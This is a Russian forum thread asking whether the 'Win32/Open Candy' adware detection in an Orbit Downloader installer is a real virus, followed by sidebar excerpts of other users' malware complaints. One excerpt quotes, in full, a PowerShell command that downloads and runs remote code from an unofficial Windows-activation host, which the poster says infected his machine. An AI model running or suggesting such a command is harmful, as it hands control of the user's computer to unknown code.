Перейти к содержанию

Win32\Open Candy - вирус или нет


Рекомендуемые сообщения

Привет Всем. Хотел бы проконсультироваться по следующему вопросу. Полтора года использую без особых проблем Orbit Downloader v3.0.0.5. После очередного обновления , пару недель назад, вирусной базы данных NOD32 v4 решил просканировать комп и в результате получил окно предупреждения об опасном обьекте - "C:\Downloads\Orbit Downloader Setup 3005.exe >> INNO>> file 0063.bin- опасная программа, Adware: Win32/Open Candy", где INNO - сокращение от названия фирмы разработчика Innoshock Team. NOD32 не может его очистить. Просканировал комп в безопасном режиме утилитами Cureit и Kaspersky Virus Removal Tool и Spybot S&D - все чисто. Просканировал этот файл на www.virustotal.com , среди 42 антивирусных сканеров только NOD32 v1651 и Microsoft v 1.6903 подтвердили наличие в установочном файле Orbit Downloader вируса Win32/Open Candy. В инете нашел инфо относительно того, что начиная с версии 4-ой в Orbit Downloader обнаруживается именно этот вирус. Можно конечно в момент удалить этот файл , но почему NOD тогда молчит о всей программе ,которая очень плодовитая и расползлась по всему компу, где только можно, начиная с браузера. Пытался поиском найти на компе файл 0063.bin , не удалось , скорее всего потому что он является составной частью ( бинарным кодом) установочного файла Orbit Downloader Setup.exe. Скорее всего NOD воспринимает часть кода установочного файла за вирус , как это сделано в тестовом файле еврофирмы , по-моему Eicar, для проверки антивирусных программ. На свой вопрос частично получил ответ на сайте http://www.opencandy.com/learn-more-about-...tions/#mse-wdef

На сайте декларируется , что фирма Open Candy предоставляет разработчикам бесплатного софта специальный плагин, который монтируется в инсталляторы бесплатного софта для рекламы программного обеспечения других производителей. За деньги от рекламы разработчики бесплатного софта поддерживают его бесплатность и модернизацию. Adware :Win32/Open Candy представляет устаревший вариант плагина этой фирмы . Все плагины этой фирмы идентифицируются антивирусными средствами Microsoft ( а теперь уже и ESET ) как низкоуровневая угроза на что представители фирмы обижаются. Далее по тексту сайта - куча обещаний и заверений фирмы, что плагины этого типа не являются шпионами и не предоставляют угрозы для пользователя. Вот теперь понятно почему мой NOD32 определил угрозу в установочном файле ( с инсталлятором ) Orbit Downloader , а не в самой программе . На форуме www.virusinfo.info задал этот же вопрос и сам на него ответил. Почему обращаюсь на Ваш форум? Да потому , что на сайте компании Open Candy Software лаборатория Касперского декларируется в качестве партнера. К вышеописанному событию отношусь философски и естественно установочный файл Orbit Downloader не удалял. Простите , чуть не забыл, повторно установочный файл Orbit Downloader не запускал , чтобы увидеть в инcталляторе программы рекламу софта третьей стороны ( может там она и есть) . Правда обратил внимание на наличие в основном окне загрузчика двух активных ссылок – « Become a fan on Facebook” и “ Follow us on Twitter”- может это и есть результат рекламных действий плагина Win32\Open Candy?

Прошу высказаться по этому вопросу , и в первую очередь, представителям лаборатории. Так, Win32\Open Candy – вирус или нет, Спасибо.

Ссылка на комментарий
Поделиться на другие сайты

Stranniky, спасибо за ответ, но я не воспользуюсь Вашим советом. Об онлайновой услуге лаборатории Касперского по лечению компьютеров от вирусов я знаю давно и это полезная услуга, но не для моего случая. Мой комп чист и действий зловредов я не наблюдаю, но факт остается фактом - в установочном файле Orbit Downloader мой NOD32 начал идентифицировать опасную программу . Кстати, в состав virustotal.com включен онлайновый сканер от Касперского v9.0.0837 и он не обнаруживает угрозу в упомянутом мной файле.

 

Принимая во внимание , что лаборатория Касперского сотрудничает с компанией Open Candy Software , я рассчитывал получить однозначный ответ относительно Win32\Open Candy. В онлайновой проверке всего компа на вирусы не вижу необходимости. Хотя , принимая во внимание , что у меня и брэндмауэр и NOD32 работают в onebound режимах ( однонаправленных режимах) я ничего не могу сказать пока о возможной утечке информации с компьютера . Это вопрос анализа сетевого трафика.

 

Прошу представителей лаборатории Касперского высказаться по данной ситуации. Спасибо.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • San4s2034
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • San4s2034
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • fertune
      От fertune
      Когда открываешь диспетчер задач то сначала ЦП грузит на 100% а потом на 10% я посмотрел через dr.web cureit и увидел то что это майнер dialer.exe, смотрел в интернете как пофиксить но никакие способы не помогли(может быть я что то делал неправильно)
      можете помочь с проблемой? Еще я пробовал его фиксить удаляя его но он опять появлялся и грузил ЦП на все 100%.
       
    • Temikst
      От Temikst
      Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
      CollectionLog-2025.02.09-23.46.zip

       
      Даже браузер сильно тормозит. после открывание диспетчер задач сразу же лучше работает\
    • VanyeJ
      От VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
×
×
  • Создать...